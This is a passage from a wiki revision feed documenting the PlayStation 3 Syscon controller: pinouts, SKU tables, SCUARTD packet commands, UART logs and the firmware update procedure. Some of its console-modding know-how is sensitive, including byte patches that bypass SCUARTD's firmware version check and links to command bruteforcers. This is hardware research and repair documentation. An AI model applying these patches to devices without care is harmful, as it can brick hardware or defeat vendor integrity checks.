|| '''csum''' || &lt;pre&gt;Checksum: [02835059] [6FC5C632] [BB9BBEC3]\n (END)&lt;/pre&gt; || Another response (v0.9.9_c1)<br /> |-<br /> | ?? || '''osbo''' || &lt;pre&gt;done\n (END)&lt;/pre&gt; ||<br /> |-<br /> |}<br /> <br /> === Notes ===<br /> <br /> * Some commands are unavailable on earlier firmwares, for example, tmpforcp is only supported on 1.3.3+.<br /> * Some commands are divided into several strings, the first part (if exists) describes a command group, the second part describes the actual command and other parts describes command arguments.<br /> * Real syscon commands have an ASCII form (a bold text in the 2nd column) instead of bytes above.<br /> * Packet with ID *0x03* notifies syscon and calls SX program (based on ZMODEM protocol) to send firmware, syscon have custom or original implementation of RX program to receive firmware. An implementation of ZMODEM protocol used by Sony: http://oss.sony.net/Products/Linux/Others/Download/DECR-1000/mips_fp_le-lrzsz-0.12.20-devtool.1.src.rpm<br /> <br /> A start of syscon's update procedure:<br /> * A CP development tool includes several scripts which are participated in syscon update procedure. It starts after a CP update via ''update_syscon.pl'' perl script.<br /> * This script checks the current syscon's firmware version. If it is in mask rom then it skips an update procedure, if not it checks major/minor/release parts of both versions and if a new version is applicable then it launches ''scfirmup'' utility and pass the firmware file path as an argument.<br /> * ''scfirmup'' is a stupid tool which prepares a connection to SCUARTD and sends an update packet with a file path inside it. There is no need to comment it, here is reimplementation: http://pastie.org/private/6h8mfeoics4mdxear7ayg<br /> <br /> A syscon's update operation in '''SCUARTD''' consists of following steps:<br /> * 1. Check if ''SX'' program presents in ''/usr/bin/sx''. It should be a regular file.<br /> * 2. Check if specified firmware file is a regular file.<br /> * 3. Halt syscon by sending command '''halt''' to UART, then wait some time until it prints ''HALT: OK''.<br /> * 4. Reset syscon by sending byte ''0x30'' to GPIO register '''SC_PI0_DIPSW''', byte ''0x30'' to GPIO register '''SC_RSTX''', waiting 1 second and writing byte ''0x31'' to GPIO register '''SC_RSTX'''.<br /> * 5. Get current syscon's firmwave version by sending command '''version''' to UART. After receiving it, look for a character after the first ''_'' (underscore) symbol from the left side of string and if it equals to the character ''b'', then proceed to the next step, otherwise go to the (8) step. (It is possible to patch this step to allow upgrading or downgrading at will)<br /> * 6. Prepare syscon for an update by sending command '''firmud''' to UART, then fork the current process; the current process won't finish until a message ''Done'' from UART arrives (it is the end of update operation).<br /> * 7. In the forked process start ''SX'' program and pass firmware file path to it. ''SX'' program reads firmware file and transfer each chunk of it to syscon.<br /> * 8. After successful update operation reset syscon (a different way) by sending byte ''0x31'' to GPIO register '''SC_PI0_DIPSW''', byte ''0x30'' to GPIO register '''SC_RSTX''', waiting 1 second and writing byte ''0x31'' to GPIO register '''SC_RSTX'''.<br /> <br /> Notes:<br /> * It seems all scuartds checks firmware revision and probably syscon is updated only once (after factory).<br /> * To be able to reflash it you need to patch ''SCUARTD'' or do a manual update without the use of ''SCUARTD''.<br /> * You need to patch a single byte in ''SCUARTD'' to be able to flash any firmware (for example, to downgrade your syscon).<br /> &lt;syntaxhighlight lang=&quot;asm&quot;&gt;<br /> .text:00403A94: /* scuartd from CP 1.3.3 */<br /> lb $v1, 1($v0)<br /> li $v0, &quot;b&quot; /* 62 00 02 24 -&gt; 63 00 02 24 */<br /> bne $v1, $v0, loc_4039F4<br /> move $a0, $zero<br /> &lt;/syntaxhighlight&gt;<br /> * An actual firmware update process (without halting and resetting steps) takes about 1 minute.<br /> * You cannot install a corrupted firmware with scfirmup unless you corrupt the header! It seems there is a hash of sorts (possibly of the plaintext) in the header preventing firmud from installing something corrupt<br /> * Updating SYSCON requires the DECR to be in standby mode! You cannot update it while it is on.<br /> * Corrupting the header and the body will make firmup install the SYSCON update anyways! be careful not to do it!<br /> * Should you brick SYSCON, here's a patch to &quot;unbrick&quot; it, do not use it unless you brick it though!<br /> &lt;syntaxhighlight lang=&quot;asm&quot;&gt;<br /> .text:004038C0:<br /> lw $a0, 4($s4)<br /> li $a1, 0x400000<br /> nop<br /> addiu $a1, (aHalt - 0x400000) # &quot;halt&quot;<br /> la $t9, scuartd_send_sccmd<br /> nop<br /> jalr $t9 ; scuartd_send_sccmd<br /> nop<br /> lw $gp, 0x1E8+var_1D8($sp)<br /> bnez $v0, loc_4039B4 /* 33 00 40 14 -&gt; 33 00 40 10 */<br /> li $a0, 1<br /> &lt;/syntaxhighlight&gt;<br /> <br /> * You can use this bruteforcer to try your luck when finding new packets : https://hastebin.com/vomogesaru.cpp<br /> <br /> == Syscon UART ==<br /> {| class=&quot;wikitable&quot;<br /> ! BGA !! Name !! Description<br /> |-<br /> | P16 || UART0_TxD || Serial Transmit<br /> |-<br /> | P15 || UART0_RxD || Serial Receive<br /> |-<br /> |}<br /> <br /> You can attach a 3.3v TTL cable (LV-TTL) to the UART on syscon (UART0_TxD, UART0_RxD). (Convenient solder points are available on JSD/JTP-001 by the NOR test points. They are marked as '?' in [[:File:JSD-001 NOR - nor testpoints.png|marcan' noraliser / judges' NORway install picture]], closest to the ground at the bottom - RX is left, TX is right) Baud rate is 57600. There is a simple plaintext protocol involved. This varies on different syscon models. Example:<br /> <br /> '''&lt;command&gt;:&lt;hash&gt;'''<br /> <br /> Where the hash is the sum of command bytes &amp; 0xFF<br /> <br /> you should terminate commands with \r\n, the syscon messages are only terminated with \n<br /> <br /> === Samples ===<br /> Here are some of the commands/messages encountered:<br /> <br /> Messages:<br /> &lt;pre&gt;Power applied (standby mode)<br /> OK 00000000:3A<br /> <br /> Power on<br /> # (PowerOn State):7F<br /> <br /> Power off (Hard shutdown)<br /> # (PowerOff State):DD<br /> <br /> After Fan test:<br /> # (PowerOff State) (Fatal):36<br /> <br /> No text, invalid hash:<br /> NG F0000002:4D&lt;/pre&gt;<br /> <br /> Commands:<br /> &lt;pre&gt;VER:ED<br /> OK 00000000 S1E 00 00 065D:A4<br /> <br /> ERRLOG:CB<br /> OK 00000000:3A<br /> <br /> DATE:1E<br /> NG F0000003:4E<br /> <br /> C:F1:BUZ<br /> E:4F:NG F0000004<br /> <br /> C:D0:CID<br /> E:50:NG F0000005<br /> <br /> C:DA:EEP<br /> E:50:NG F0000005<br /> <br /> C:D5:FAN<br /> E:50:NG F0000005<br /> <br /> C:F4:KSV<br /> E:50:NG F0000005<br /> <br /> C:ED:REV<br /> E:50:NG F0000005<br /> <br /> C:F8:SPU<br /> E:50:NG F0000005&lt;/pre&gt;<br /> more [[Talk:System_Controller_Firmware#Syscon_commands|Syscon commands]]<br /> <br /> bruteforcing commands:&lt;!--// LOL //--&gt; http://pastebin.com/CNei0xbC&lt;br&gt;<br /> <br /> VERY IMPORTANT:<br /> * Max size of a command is 11 characters,16 if you count with C:&lt;hash&gt;:<br /> * Sending a command with 11 chars results in NO OUTPUT<br /> * Sending a command with more than 11 chars results in NG F0000002<br /> * Max size of a command on DECR is 135, 140 if you count with C:&lt;hash&gt;:<br /> <br /> == Syscon (SPI) EEPROM ==<br /> {| class=&quot;wikitable&quot;<br /> ! BGA !! Name !! Description<br /> |-<br /> | F16 || CSB || Chip Select (needs to be low)<br /> |-<br /> | H16 || DO || Serial Data Output<br /> |-<br /> | G16 || DI || Serial Data Input<br /> |-<br /> | E16 || SKB || Serial Data Clock<br /> |-<br /> | J15 || WCB || Write Protect<br /> |-<br /> | J16 || RBB || Ready/Busy<br /> |-<br /> | G11 || VDDep || + 3.3V<br /> |-<br /> | C15 || VSSep || GND<br /> |-<br /> |}<br /> <br /> == Syscon JTAG ==<br /> disabled in factory after production on retailmodels<br /> {| class=&quot;wikitable&quot;<br /> ! BGA !! Name !! Description<br /> |-<br /> | L8 || JRTCK || Return Test Clock<br /> |-<br /> | K8 || JTCK || Test Clock<br /> |-<br /> | K9 || JTDO || Test Data Out<br /> |-<br /> | L9 || JTMS || Test Mode State / Test Mode Select<br /> |-<br /> | K7 || JTDI || Test Data In<br /> |-<br /> | L7 || JNTRST || Test Reset<br /> |-<br /> |}<br /> <br /> = Syscon Underlaying ports =<br /> == Syscon Cell SPI Bus ==<br /> {| class=&quot;wikitable&quot;<br /> ! BGA !! Name !! Description<br /> |-<br /> | M2 || /BE_SPI_CS || Chip Select<br /> |-<br /> | N2 || BE_SPI_DO || Serial Data Output<br /> |-<br /> | M1 || BE_SPI_DI || Serial Data Input<br /> |-<br /> | N1 || BE_SPI_CLK || Serial Data Clock<br /> |-<br /> | P2 || /BE_RESET || CellBE Reset<br /> |-<br /> | P1 || BE_POWGOOD || CellBE PowerGood<br /> |-<br /> | T2 || /BE_INT || CellBE Interrupt<br /> |-<br /> |}<br /> <br /> == Syscon Southbridge SPI Bus ==<br /> {| class=&quot;wikitable&quot;<br /> ! BGA !! Name !! Description<br /> |-<br /> | B9 || /SB_SPI_CS || Chip Select<br /> |-<br /> | B8 || SB_SPI_DO || Serial Data Output<br /> |-<br /> | A9 || SB_SPI_DI || Serial Data Input<br /> |-<br /> | A8 || SB_SPI_CLK || Serial Data Clock<br /> |-<br /> |}<br /> <br /> &lt;!--// Remote Power ON/OFF (from network, HDMI CEC commands, etc...) is managed by devices connected to the southbridge (ethernet/wifi/BT, HDMI controller, etc...) //--&gt;<br /> <br /> <br /> {{Motherboard Components}}&lt;noinclude&gt;[[Category:Main]]&lt;/noinclude&gt;</div> Mathieulh http://www.psdevwiki.com/ps3/index.php?title=Syscon_Hardware&diff=44686 Syscon Hardware 2017-07-07T13:24:15Z <p>Mathieulh: /* Notes */ command name typo</p> <hr /> <div>&lt;div style=&quot;float:right&quot;&gt;[[File:SYSCON_GEN1.JPG|thumb|Syscon 1st Generation (BGA Packaging)]]&lt;br /&gt;[[File:Pyramid Syscon live probing.jpg|thumb|Pyramid Syscon live probing]]&lt;/div&gt;<br /> <br /> Syscon is the main power controller chip. It is responsible for powering up the various power systems and for configuring and initialising the [[CELL BE]], [[RSX]] and [[South Bridge]]. It communicates with these devices via seperate SPI busses. There is external access by JTAG (disabled from factory on retail models), an EEPROM programming interface &lt;!-- not fully examined --&gt; and Serial (UART). The Syscon is a SoC and consists of an ARM7TDMI (ARMv4) CPU, a 256KB EEPROM and 16KB RAM.<br /> <br /> = Serialnumbers @ SKU =<br /> <br /> == Retail ==<br /> {| class=&quot;wikitable sortable&quot;<br /> |-<br /> ! [[SKU Models|Model]] !! [[IDPS|Type]] !! [[Motherboard Revisions|Board]] !! [[Syscon Hardware|Syscon&lt;br /&gt;part no.]] !! Syscon&lt;br /&gt;[[More System Information#First_section|Soft ID]] !! Notes<br /> |-<br /> | [[CECHAxx]]&lt;br /&gt;[[CECHBxx]] || 0x01&lt;br /&gt;0x02 || [[COK-00x#COK-001|COK-001]] || [[CXR713120-201GB]] || 0B8E || <br /> |-<br /> | [[CECHCxx]]&lt;br /&gt;[[CECHExx]] || 0x03&lt;br /&gt;0x04 || [[COK-00x#COK-002|COK-002]] or&lt;br /&gt;[[COK-00x#COK-002W|COK-002W]] || [[CXR713120-201GB]] or&lt;br /&gt;[[CXR713120-202GB]] || 0C16 || <br /> |-<br /> | [[CECHGxx]] || 0x05 || [[SEM-00x|SEM-001]] || [[CXR713120-201GB]] or&lt;br /&gt;[[CXR713120-202GB]] or&lt;br /&gt;[[CXR713120-203GB]] || 0D52 ||<br /> |-<br /> | [[CECHHxx]] || 0x06 || [[DIA-00x#DIA-001|DIA-001]] || [[CXR714120-301GB]] || 0DBF ||<br /> |-<br /> | [[CECHJxx]]&lt;br /&gt;[[CECHKxx]] || 0x07 || [[DIA-00x#DIA-002|DIA-002]] || [[CXR714120-301GB]] or&lt;br /&gt;[[CXR714120-302GB]] || 0E69 || <br /> |-<br /> | [[CECHLxx]]&lt;br /&gt;[[CECHMxx]]&lt;br /&gt;[[CECHPxx]]&lt;br /&gt;[[CECHQxx]] || 0x08 || [[VER-00x|VER-001]] || [[SW-301]] or&lt;br /&gt;[[SW-302]] || 065D ||<br /> |-<br /> | [[CECH-20xx]] || 0x09 || [[DYN-00x|DYN-001]] || [[SW2-301]] || 0832 || <br /> |-<br /> | [[CECH-21xx]] || 0x0A || [[SUR-00x|SUR-001]] || [[SW2-301]] or&lt;br /&gt;[[SW2-302]] || 08A0 || <br /> |-<br /> | [[CECH-25xx]] || 0x0B || [[JTP-00x|JTP-001]] or&lt;br /&gt;[[JSD-00x|JSD-001]] || [[SW2-301]] or&lt;br /&gt;[[SW2-302]]&amp;nbsp;&amp;nbsp;or&lt;br /&gt;[[SW2-303]] || 08C2 || <br /> |-<br /> | [[CECH-30xx]] || 0x0C || [[KTE-00x|KTE-001]] || [[SW2-301]] or&lt;br /&gt;[[SW2-302]] or&lt;br /&gt;[[SW2-303]] || 0918 || <br /> |-<br /> | [[CECH-40xx]] || 0x0D || [[MSX-00x|MSX-001]] or&lt;br /&gt;[[MPX-00x|MPX-001]] || [[SW3-302]] || 098F || <br /> |-<br /> |}<br /> <br /> ==Non retail==<br /> {| class=&quot;wikitable sortable&quot;<br /> |-<br /> ! [[SKU Models|Model]] !! [[IDPS|Type]] !! [[Motherboard Revisions|Board]] !! [[Syscon Hardware|Syscon&lt;br /&gt;part no.]] !! Syscon&lt;br /&gt;[[More System Information#First_section|Soft ID]] !! Active JTAG !! Notes<br /> |-<br /> | [[CEB-2040]] || - || [[MPU-501]] || [[CXR713F120|CXR713F120GB-000]] || || Yes || Retail prototype<br /> |-<br /> | [[DECR-1000|DECR1000(A/J)]] || 0x01 || [[TMU-520]] || [[CXR713F120A]] || 03FB || Yes || Reference tool<br /> |-<br /> | [[DEH-H1000A(S)(-E(S))]] || 0x01 || [[COK-001 (Prototype)]] || [[CXR713F120A]] || 0B67 || Yes || Preproduction<br /> |-<br /> | [[DEH-H1001-D]] || 0x01 || [[COOKIE-13]] || [[CXR713F120A]] || ?0B67? || Yes || Preproduction<br /> |-<br /> | [[DEH-FH1500J-A]] || || [[VERTIGO-02]] || || || || Preproduction<br /> |-<br /> &lt;!-- Not Prototype debug units - see retail --&gt;<br /> |}<br /> &lt;br/&gt;<br /> ----<br /> <br /> Not mentioned:&lt;pre&gt;<br /> 0F29 - ?<br /> 0F38 - ?&lt;/pre&gt;<br /> <br /> = Syscon Externalised Ports =<br /> '''Note:''' for more specific information per model, see the links to each subppage in the Serialnumbers @ SKU table.<br /> <br /> == Syscon UART packets ==<br /> <br /> === SCUART daemon (SCUARTD) packet structure ===<br /> <br /> SCUARTD packets includes header of 0x3 bytes and optional payload (depending on the command).<br /> Packet IDs are not important, they are used only by clients and processed by SCUART daemon. SCUART daemon opens terminal file /dev/ttyS0 and use it to send commands and receive responses.<br /> <br /> {| class=&quot;wikitable&quot;<br /> |-<br /> ! Offset !! Size !! Description<br /> |-<br /> | 0x00 || 0x01 || Magic?<br /> |-<br /> | 0x01 || 0x01 || Payload size<br /> |-<br /> | 0x02 || 0x01 || Command<br /> |-<br /> | 0x03 || Payload size || Payload data<br /> |-<br /> |}<br /> <br /> === Packets ===<br /> <br /> {| class=&quot;wikitable&quot;<br /> ! Packet ID !! Command/Action !! Description !! Notes<br /> |-<br /> | 0x00 || '''version''' || Firmware version || Gets installed syscon's firmware version (Note: backup bank contains version 0.4.5_b4 !! On CEB-2030 it is 0.3.0 )<br /> |-<br /> | 0x01 || '''bringup''' || || &lt;!--// Standby-&gt;ON (Remote Power ON using an UART package, from [[Communication Processor]] ?) //--&gt;<br /> |-<br /> | 0x02 || '''shutdown''' || || &lt;!--// ON-&gt;Standby (Remote Power OFF using an UART package, from [[Communication Processor]] ?) //--&gt;<br /> |-<br /> | 0x03 || '''firmud''' || Firmware update || Notifies about firmware update operation<br /> |-<br /> | 0x04 || '''bsn''' || Board Serial Number || Retrieves syscon's Board Serial Number<br /> |-<br /> | 0x05 || '''halt''' || || Used at start of firmware update operation<br /> |-<br /> | 0x06 || '''cp ready''' || || &lt;!--// [[Communication Processor]] related, for [[SKU_Models_Nonretail#Reference_Tool_.28Tool.2FDECR.29 | Tool/DECR models]] //--&gt;<br /> |-<br /> | 0x07 || '''cp busy''' || || &lt;!--// [[Communication Processor]] related, for [[SKU_Models_Nonretail#Reference_Tool_.28Tool.2FDECR.29 | Tool/DECR models]] //--&gt;<br /> |-<br /> | 0x08 || '''cp reset''' || || &lt;!--// [[Communication Processor]] related, for [[SKU_Models_Nonretail#Reference_Tool_.28Tool.2FDECR.29 | Tool/DECR models]] //--&gt;<br /> |-<br /> | 0x09 || '''bestat''' || Cell B.E. status || Retrieves Cell B.E. status<br /> |-<br /> | 0x0A || '''powersw''' || &lt;!-- Power switch ? --&gt; ||<br /> |-<br /> | 0x0B || '''resetsw''' || &lt;!-- Reset switch ? --&gt; ||<br /> |-<br /> | 0x0C || '''bootbeep stat''' || ||<br /> |-<br /> | 0x0D || '''bootbeep on''' || ||<br /> |-<br /> | 0x0E || '''bootbeep off''' || ||<br /> |-<br /> | 0x0F || ''Reset syscon'' || Reset || Resets syscon<br /> |-<br /> | 0x10 || '''xdrdiag info''' || XDR diagnostics ||<br /> |-<br /> | 0x11 || '''xdrdiag start''' || XDR diagnostics || Starts XDR diagnostics<br /> |-<br /> | 0x12 || '''xdrdiag result''' || XDR diagnostics || Gets a result of XDR diagnostics<br /> |-<br /> | 0x13 || '''xiodiag''' || XIO diagnostics || Starts XIO diagnostics and gets a result of it<br /> |-<br /> | 0x14 || '''fandiag''' || Fan diagnostics || Retrieves RPMs of fans<br /> |-<br /> | 0x15 || '''errlog''' || Error log || Retrieves a list of codes (with timestamps) of latest errors<br /> |-<br /> | 0x16 || ''Read line'' || ||<br /> |-<br /> | 0x17 || '''tmpforcp &lt;zone ID&gt;''' || Reference Tool's temperature || Gets the temperature of reference tool<br /> |-<br /> | 0x18 || rowspan=&quot;7&quot; colspan=&quot;3&quot; style=&quot;background:lightgrey; color:#ff0000; text-align: center;&quot; | Invalid CMDs<br /> |-<br /> | 0x19<br /> |-<br /> | 0x1A<br /> |-<br /> | 0x1B<br /> |-<br /> | 0x1C<br /> |-<br /> | 0x1E<br /> |-<br /> | 0x1F<br /> |-<br /> | 0x20 || '''cp beepremote''' || ||<br /> |-<br /> | 0x21 || '''cp beep2kn1n3''' || ||<br /> |-<br /> | 0x22 || '''cp beep2kn2n3''' || ||<br /> |-<br /> | ?? || '''csum''' || Checksum ?? || Calculates the Checksum of something (No packet ID listing on scuartd)<br /> |-<br /> | ?? || '''osbo''' || ??? || No idea what this does, but returns &lt;pre&gt;done&lt;/pre&gt; when it's sent &lt;!--Operative System Boot Order ?... something related with gameOS/otherOS boot flag ? --&gt;<br /> |-<br /> | ?? || '''scopen''' || returns SC_READY or ERROR 1 || ???<br /> |-<br /> | ?? || '''scclose''' || || ???<br /> |-<br /> |}<br /> <br /> === Packets Logs ===<br /> <br /> {| class=&quot;wikitable&quot;<br /> ! Packet ID !! Command/Action !! Logs !! Notes<br /> |-<br /> | 0x00 || '''version''' || &lt;pre&gt; version\nv1.0.4_c2\n (END) &lt;/pre&gt; ||<br /> |-<br /> | 0x01 || '''bringup''' || &lt;pre&gt; (END) &lt;/pre&gt; ||<br /> |-<br /> | 0x02 || '''shutdown''' || &lt;pre&gt; Do nothing. (PowerOff State)\n (END) &lt;/pre&gt; || Returns (END) if the system is on <br /> |-<br /> | 0x03 || '''firmud''' || &lt;pre&gt; Start...\nErase User Program Area\n (END) &lt;/pre&gt; || This will brick your SYSCON if you don't feed it any argument or feed to it the wrong argument!<br /> |-<br /> | 0x04 || '''bsn''' || &lt;pre&gt; bsn\nNANNNNNNNNNA\n (END) &lt;/pre&gt; || N is digit and A is char (removed for privacy)<br /> |-<br /> | 0x05 || '''halt''' || &lt;pre&gt; halt\n (END)&lt;/pre&gt; ||<br /> |-<br /> | 0x06 || '''cp ready''' || &lt;pre&gt; cp ready\nCP READY: OK\n (END) &lt;/pre&gt; || <br /> |-<br /> | 0x07 || '''cp busy''' || &lt;pre&gt; cp ready\nCP BUSY: OK\n (END) &lt;/pre&gt; || STATUS light blinks forever<br /> |-<br /> | 0x08 || '''cp reset''' || No response || Should reset CP to factory settings<br /> |-<br /> | 0x09 || '''bestat''' || &lt;pre&gt; (PowerOff State)\n (END) &lt;/pre&gt;||<br /> |-<br /> | 0x0A || '''powersw''' || &lt;pre&gt; (END) &lt;/pre&gt; ||<br /> |-<br /> | 0x0B || '''resetsw''' || &lt;pre&gt; (END) &lt;/pre&gt; ||<br /> |-<br /> | 0x0C || '''bootbeep stat''' || &lt;pre&gt; BOOT BEEP: ON\n (END) &lt;/pre&gt; || when it's off BOOT BEEP status changes to OFF<br /> |-<br /> | 0x0D || '''bootbeep on''' || &lt;pre&gt; BOOT BEEP ON: DONE\n (END) &lt;/pre&gt; || <br /> |-<br /> | 0x0E || '''bootbeep off''' || &lt;pre&gt; BOOT BEEP OFF: DONE\n (END) &lt;/pre&gt; ||<br /> |-<br /> | 0x0F || '''Reset syscon''' || ||<br /> |-<br /> | 0x10 || '''xdrdiag info''' || &lt;pre&gt; 32\n (END) &lt;/pre&gt; ||<br /> |-<br /> | 0x11 || '''xdrdiag start''' || &lt;pre&gt; DIAG START\n (END) &lt;/pre&gt; ||<br /> |-<br /> | 0x12 || '''xdrdiag result''' || &lt;pre&gt; XDR OK\n (END) &lt;/pre&gt; || will return ERROR NOT STARTED if xdrdiag start wasn't run previously<br /> |-<br /> | 0x13 || '''xiodiag''' || &lt;pre&gt; 0 903\n (END) &lt;/pre&gt; ||<br /> |-<br /> | 0x14 || '''fandiag''' || &lt;pre&gt; ERROR FAN ACTIVE\n (END) &lt;/pre&gt; ||<br /> |-<br /> | 0x15 || '''errlog''' || &lt;pre&gt; ofst[ %d]:err_code:0x%08X, clock:0x%08X YYYY/MM/DD HH:MM:SS &lt;/pre&gt; || bunch of error logs. ends with (END) once they're over<br /> |-<br /> | 0x16 || '''Read line''' || ||<br /> |-<br /> | 0x17 || '''tmpforcp &lt;zone ID&gt;''' || <br /> |-<br /> | 0x20 || '''cp beepremote''' || &lt;pre&gt; (END)&lt;/pre&gt; ||<br /> |-<br /> | 0x21 || '''cp beep2kn1n3''' || &lt;pre&gt; (END)&lt;/pre&gt; || sends a beep different than SYSCON beep :)<br /> |-<br /> | 0x22 || '''cp beep2kn2n3''' || &lt;pre&gt; (END)&lt;/pre&gt; || sends two beeps different than SYSCON beeps :)<br /> |-<br /> | ?? || '''csum''' || &lt;pre&gt;Checksum: [027460C9] [68269779] [C19A855E]\n (END)&lt;/pre&gt; || displays 3 hexadecimal numbers inside rect parenthesis. the numbers are always the same, except when syscon version changes (v1.0.5_c1) <br /> |-<br /> | ?? || '''csum''' || &lt;pre&gt;Checksum: [02746F91] [682F04DA] [27688CF5]\n (END)&lt;/pre&gt; || Another response (v1.0.4_c2)<br /> |-<br /> | ?? || '''csum''' || &lt;pre&gt;Checksum: [0274C877] [684DA659] [EA426BB1]\n (END)&lt;/pre&gt; || Another response (v1.0.4_c1)<br /> |-<br /> | ?? || '''csum''' || &lt;pre&gt;Checksum: [027B4064] [6B450C64] [4FBF6DA3]\n (END)&lt;/pre&gt; || Another response (v1.0.3_c1)<br /> |-<br /> | ?? || '''csum''' || &lt;pre&gt;Checksum: [027E1B71] [6CDA9F25] [E0C67065]\n (END)&lt;/pre&gt; || Another response (v1.0.1_c1)<br /> |-<br /> | ?? || '''csum''' || &lt;pre&gt;Checksum: [02812855] [6E83917C] [D40F70A5]\n (END)&lt;/pre&gt; || Another response (v0.9.14_c1)<br /> |-<br /> | ?? || '''csum''' || &lt;pre&gt;Checksum: [02835059] [6FC5C632] [BB9BBEC3]\n (END)&lt;/pre&gt; || Another response (v0.9.9_c1)<br /> |-<br /> | ?? || '''osbo''' || &lt;pre&gt;done\n (END)&lt;/pre&gt; ||<br /> |-<br /> |}<br /> <br /> === Notes ===<br /> <br /> * Some commands are unavailable on earlier firmwares, for example, tmpforcp is only supported on 1.3.3+.<br /> * Some commands are divided into several strings, the first part (if exists) describes a command group, the second part describes the actual command and other parts describes command arguments.<br /> * Real syscon commands have an ASCII form (a bold text in the 2nd column) instead of bytes above.<br /> * Packet with ID *0x03* notifies syscon and calls SX program (based on ZMODEM protocol) to send firmware, syscon have custom or original implementation of RX program to receive firmware. An implementation of ZMODEM protocol used by Sony: http://oss.sony.net/Products/Linux/Others/Download/DECR-1000/mips_fp_le-lrzsz-0.12.20-devtool.1.src.rpm<br /> <br /> A start of syscon's update procedure:<br /> * A CP development tool includes several scripts which are participated in syscon update procedure. It starts after a CP update via ''update_syscon.pl'' perl script.<br /> * This script checks the current syscon's firmware version. If it is in mask rom then it skips an update procedure, if not it checks major/minor/release parts of both versions and if a new version is applicable then it launches ''scfirmup'' utility and pass the firmware file path as an argument.<br /> * ''scfirmup'' is a stupid tool which prepares a connection to SCUARTD and sends an update packet with a file path inside it. There is no need to comment it, here is reimplementation: http://pastie.org/private/6h8mfeoics4mdxear7ayg<br /> <br /> A syscon's update operation in '''SCUARTD''' consists of following steps:<br /> * 1. Check if ''SX'' program presents in ''/usr/bin/sx''. It should be a regular file.<br /> * 2. Check if specified firmware file is a regular file.<br /> * 3. Halt syscon by sending command '''halt''' to UART, then wait some time until it prints ''HALT: OK''.<br /> * 4. Reset syscon by sending byte ''0x30'' to GPIO register '''SC_PI0_DIPSW''', byte ''0x30'' to GPIO register '''SC_RSTX''', waiting 1 second and writing byte ''0x31'' to GPIO register '''SC_RSTX'''.<br /> * 5. Get current syscon's firmwave version by sending command '''version''' to UART. After receiving it, look for a character after the first ''_'' (underscore) symbol from the left side of string and if it equals to the character ''b'', then proceed to the next step, otherwise go to the (8) step. (It is possible to patch this step to allow upgrading or downgrading at will)<br /> * 6. Prepare syscon for an update by sending command '''firmud''' to UART, then fork the current process; the current process won't finish until a message ''Done'' from UART arrives (it is the end of update operation).<br /> * 7. In the forked process start ''SX'' program and pass firmware file path to it. ''SX'' program reads firmware file and transfer each chunk of it to syscon.<br /> * 8. After successful update operation reset syscon (a different way) by sending byte ''0x31'' to GPIO register '''SC_PI0_DIPSW''', byte ''0x30'' to GPIO register '''SC_RSTX''', waiting 1 second and writing byte ''0x31'' to GPIO register '''SC_RSTX'''.<br /> <br /> Notes:<br /> * It seems all scuartds checks firmware revision and probably syscon is updated only once (after factory).<br /> * To be able to reflash it you need to patch ''SCUARTD'' or do a manual update without the use of ''SCUARTD''.<br /> * You need to patch a single byte in ''SCUARTD'' to be able to flash any firmware (for example, to downgrade your syscon).<br /> &lt;syntaxhighlight lang=&quot;asm&quot;&gt;<br /> .text:00403A94: /* scuartd from CP 1.3.3 */<br /> lb $v1, 1($v0)<br /> li $v0, &quot;b&quot; /* 62 00 02 24 -&gt; 63 00 02 24 */<br /> bne $v1, $v0, loc_4039F4<br /> move $a0, $zero<br /> &lt;/syntaxhighlight&gt;<br /> * An actual firmware update process (without halting and resetting steps) takes about 1 minute.<br /> * You cannot install a corrupted firmware with scfirmup unless you corrupt the header! It seems there is a hash of sorts (possibly of the plaintext) in the header preventing scfirmud from installing something corrupt<br /> * Updating SYSCON requires the DECR to be in standby mode! You cannot update it while it is on.<br /> * Corrupting the header and the body will make firmup install the SYSCON update anyways! be careful not to do it!<br /> * Should you brick SYSCON, here's a patch to &quot;unbrick&quot; it, do not use it unless you brick it though!<br /> &lt;syntaxhighlight lang=&quot;asm&quot;&gt;<br /> .text:004038C0:<br /> lw $a0, 4($s4)<br /> li $a1, 0x400000<br /> nop<br /> addiu $a1, (aHalt - 0x400000) # &quot;halt&quot;<br /> la $t9, scuartd_send_sccmd<br /> nop<br /> jalr $t9 ; scuartd_send_sccmd<br /> nop<br /> lw $gp, 0x1E8+var_1D8($sp)<br /> bnez $v0, loc_4039B4 /* 33 00 40 14 -&gt; 33 00 40 10 */<br /> li $a0, 1<br /> &lt;/syntaxhighlight&gt;<br /> <br /> * You can use this bruteforcer to try your luck when finding new packets : https://hastebin.com/vomogesaru.cpp<br /> <br /> == Syscon UART ==<br /> {| class=&quot;wikitable&quot;<br /> ! BGA !! Name !! Description<br /> |-<br /> | P16 || UART0_TxD || Serial Transmit<br /> |-<br /> | P15 || UART0_RxD || Serial Receive<br /> |-<br /> |}<br /> <br /> You can attach a 3.3v TTL cable (LV-TTL) to the UART on syscon (UART0_TxD, UART0_RxD). (Convenient solder points are available on JSD/JTP-001 by the NOR test points. They are marked as '?' in [[:File:JSD-001 NOR - nor testpoints.png|marcan' noraliser / judges' NORway install picture]], closest to the ground at the bottom - RX is left, TX is right) Baud rate is 57600. There is a simple plaintext protocol involved. This varies on different syscon models. Example:<br /> <br /> '''&lt;command&gt;:&lt;hash&gt;'''<br /> <br /> Where the hash is the sum of command bytes &amp; 0xFF<br /> <br /> you should terminate commands with \r\n, the syscon messages are only terminated with \n<br /> <br /> === Samples ===<br /> Here are some of the commands/messages encountered:<br /> <br /> Messages:<br /> &lt;pre&gt;Power applied (standby mode)<br /> OK 00000000:3A<br /> <br /> Power on<br /> # (PowerOn State):7F<br /> <br /> Power off (Hard shutdown)<br /> # (PowerOff State):DD<br /> <br /> After Fan test:<br /> # (PowerOff State) (Fatal):36<br /> <br /> No text, invalid hash:<br /> NG F0000002:4D&lt;/pre&gt;<br /> <br /> Commands:<br /> &lt;pre&gt;VER:ED<br /> OK 00000000 S1E 00 00 065D:A4<br /> <br /> ERRLOG:CB<br /> OK 00000000:3A<br /> <br /> DATE:1E<br /> NG F0000003:4E<br /> <br /> C:F1:BUZ<br /> E:4F:NG F0000004<br /> <br /> C:D0:CID<br /> E:50:NG F0000005<br /> <br /> C:DA:EEP<br /> E:50:NG F0000005<br /> <br /> C:D5:FAN<br /> E:50:NG F0000005<br /> <br /> C:F4:KSV<br /> E:50:NG F0000005<br /> <br /> C:ED:REV<br /> E:50:NG F0000005<br /> <br /> C:F8:SPU<br /> E:50:NG F0000005&lt;/pre&gt;<br /> more [[Talk:System_Controller_Firmware#Syscon_commands|Syscon commands]]<br /> <br /> bruteforcing 